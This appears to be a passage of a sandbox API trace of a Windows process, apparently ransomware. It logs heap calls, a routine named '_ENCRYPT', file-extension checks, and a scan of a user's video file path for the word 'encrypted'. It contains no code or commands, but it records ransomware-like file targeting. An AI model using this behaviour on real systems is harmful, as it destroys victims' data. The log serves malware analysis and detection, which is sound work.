hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0042.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0042.874] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.875] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.875] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.875] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0042.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.876] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889910 [0042.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0042.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.876] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0042.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.876] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.876] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0042.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.877] CloseHandle (hObject=0x128) returned 1 [0042.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.877] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.877] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.877] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.878] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0042.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0042.878] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.878] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0042.878] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.878] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0042.878] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0042.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.878] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.878] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.878] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.879] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54ff2c10, ftCreationTime.dwHighDateTime=0x1d5ba65, ftLastAccessTime.dwLowDateTime=0x834c3d80, ftLastAccessTime.dwHighDateTime=0x1d5c341, ftLastWriteTime.dwLowDateTime=0x834c3d80, ftLastWriteTime.dwHighDateTime=0x1d5c341, nFileSizeHigh=0x0, nFileSizeLow=0x35ac, dwReserved0=0x0, dwReserved1=0x777648, cFileName="8Y1tRpLFO1LPoJ0Q.swf", cAlternateFileName="8Y1TRP~1.SWF")) returned 0x7c20c0 [0042.879] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.879] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.879] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54ff2c10, ftCreationTime.dwHighDateTime=0x1d5ba65, ftLastAccessTime.dwLowDateTime=0x834c3d80, ftLastAccessTime.dwHighDateTime=0x1d5c341, ftLastWriteTime.dwLowDateTime=0x834c3d80, ftLastWriteTime.dwHighDateTime=0x1d5c341, nFileSizeHigh=0x0, nFileSizeLow=0x35ac, dwReserved0=0x0, dwReserved1=0x777648, cFileName="8Y1tRpLFO1LPoJ0Q.swf", cAlternateFileName="8Y1TRP~1.SWF")) returned 0x7c20c0 [0042.879] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0042.879] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y1tRpLFO1LPoJ0Q.swf\"", cchCount1=9, 